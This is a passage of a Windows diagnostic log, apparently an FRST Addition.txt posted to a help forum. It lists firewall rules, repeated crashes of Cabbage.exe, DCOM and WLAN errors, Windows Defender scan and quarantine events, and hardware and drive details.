C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{59A02139-0E4C-4137-87BE-F7B18EF315B6}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{5822A129-E6A8-4E90-B9A6-82B4535475F0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{50985CF5-9AB4-43E0-888A-40B2A91E672E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{01738336-B366-4441-B98C-8C33436F9D75}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{922812C0-F35E-49AA-B977-55CDED44A213}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Restore Points ========================= ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (05/26/2019 08:04:12 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: ntdll.dll, version: 10.0.17134.556, time stamp: 0x74bed8b0 Exception code: 0xc0000005 Fault offset: 0x000000000003b6e8 Faulting process id: 0x176c Faulting application start time: 0x01d513f421b1b145 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll Report Id: ac67a311-600e-41c7-8b6b-49063784929a Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:28:07 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc000041d Fault offset: 0x0000000000244383 Faulting process id: 0x2bb8 Faulting application start time: 0x01d513f0aab5c790 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: 7f30f9fe-957e-44fa-84ca-2788316ab296 Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:28:05 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc0000005 Fault offset: 0x0000000000244383 Faulting process id: 0x2bb8 Faulting application start time: 0x01d513f0aab5c790 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: be1329eb-1134-4ce3-a796-f72b458a3beb Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:22:34 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc000041d Fault offset: 0x0000000000244383 Faulting process id: 0x1718 Faulting application start time: 0x01d513efe7bd8b31 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: 64185bbe-49d4-42f8-8a47-c9e07a4c3c44 Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:22:33 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc0000005 Fault offset: 0x0000000000244383 Faulting process id: 0x1718 Faulting application start time: 0x01d513efe7bd8b31 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: 51ee6e37-6783-46c7-a828-9b24dfe2bf09 Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:21:55 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc000041d Fault offset: 0x0000000000244383 Faulting process id: 0x253c Faulting application start time: 0x01d513efa2daa570 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: d7b797aa-278a-4f95-98d4-982478a63022 Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:21:54 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Exception code: 0xc0000005 Fault offset: 0x0000000000244383 Faulting process id: 0x253c Faulting application start time: 0x01d513efa2daa570 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\Program Files\Cabbage\Cabbage.exe Report Id: 8aa8d005-408f-4ee4-867e-78768dfee6bc Faulting package full name: Faulting package-relative application ID: Error: (05/26/2019 07:19:57 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: Cabbage.exe, version: 1.0.0.0, time stamp: 0x5b913d1b Faulting module name: ntdll.dll, version: 10.0.17134.556, time stamp: 0x74bed8b0 Exception code: 0xc0000005 Fault offset: 0x000000000003b6e8 Faulting process id: 0x10c Faulting application start time: 0x01d513ef56b8ca81 Faulting application path: C:\Program Files\Cabbage\Cabbage.exe Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll Report Id: e7e16031-81be-4a2e-b43d-81a6c54fb82e Faulting package full name: Faulting package-relative application ID: System errors: ============= Error: (06/09/2019 07:50:54 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (06/09/2019 07:49:30 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-DQ6B75G) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user DESKTOP-DQ6B75G\MYMLA SID (S-1-5-21-1007420050-912919110-3395148121-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (06/09/2019 07:48:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-DQ6B75G) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user DESKTOP-DQ6B75G\MYMLA SID (S-1-5-21-1007420050-912919110-3395148121-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (06/09/2019 07:48:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} and APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (06/09/2019 07:48:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} and APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (06/09/2019 07:46:31 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY) Description: WLAN Extensibility Module has stopped unexpectedly. Module Path: C:\WINDOWS\system32\Rtlihvs.dll Error: (06/09/2019 07:46:31 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY) Description: WLAN Extensibility Module has stopped unexpectedly. Module Path: C:\WINDOWS\system32\Rtlihvs.dll Error: (06/09/2019 07:46:25 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY) Description: WLAN Extensibility Module has stopped unexpectedly. Module Path: C:\WINDOWS\system32\Rtlihvs.dll Windows Defender: =================================== Date: 2018-09-19 18:10:38.815 Description: Windows Defender Antivirus scan has been stopped before completion. Scan ID: {150C15E3-BADA-45B8-8663-5719F59E911F} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-09-19 17:57:05.840 Description: Windows Defender Antivirus scan has been stopped before completion. Scan ID: {7571F3C6-5B24-4D15-B83D-7E6731A8E994} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-09-19 17:39:46.437 Description: Windows Defender Antivirus scan has been stopped before completion. Scan ID: {5757DC07-376D-4FF9-AA15-CD210EDB7DC7} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-09-19 17:12:25.633 Description: Windows Defender Antivirus scan has been stopped before completion. Scan ID: {939F5361-6C75-4B17-863C-FD6EA9258FD5} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-09-19 16:47:47.928 Description: Windows Defender Antivirus scan has been stopped before completion. Scan ID: {17F49943-FB39-4F5C-8487-B09F31A1A498} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-09-19 12:50:34.004 Description: Windows Defender Antivirus has encountered an error trying to restore an item from quarantine. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Genbhv&threatid=2147728464&enterprise=0 Name: Trojan:Win32/Genbhv ID: 2147728464 Severity: Severe Category: Trojan Error Code: 0x80508014 Error description: The quarantined item cannot be restored. Signature Version: AV: 1.275.1487.0, AS: 1.275.1487.0 Engine Version: 1.1.15200.1 ==================== Memory info =========================== BIOS: LENOVO O38KT20A 06/09/2017 Motherboard: LENOVO 3100 Processor: AMD Ryzen 5 1400 Quad-Core Processor Percentage of memory in use: 41% Total physical RAM: 8129.54 MB Available physical RAM: 4720.91 MB Total Virtual: 9409.54 MB Available Virtual: 5488.57 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:1840.68 GB) (Free:438.43 GB) NTFS Drive e: (NIKON D90) (Removable) (Total:1.84 GB) (Free:1.79 GB) FAT \\?\Volume{83fcff60-2af0-406f-800a-334a93db52ca}\ (WinRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.58 GB) NTFS \\?\Volume{c262150b-f125-435c-9e9e-88ffa3ed74e4}\ (LENOVO_PART) (Fixed) (Total:20 GB) (Free:8.46 GB) NTFS \\?\Volume{d22b1664-b5cd-4faf-ab62-e32099f20f5c}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 1863 GB) (Disk ID: 4212AA6F) Partition: GPT. ======================================================== Disk: 1 (Protective MBR) (Size: 1.8 GB) (Disk ID: 00000000) Partition: GPT. ==================== End of Addition.txt ============================
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.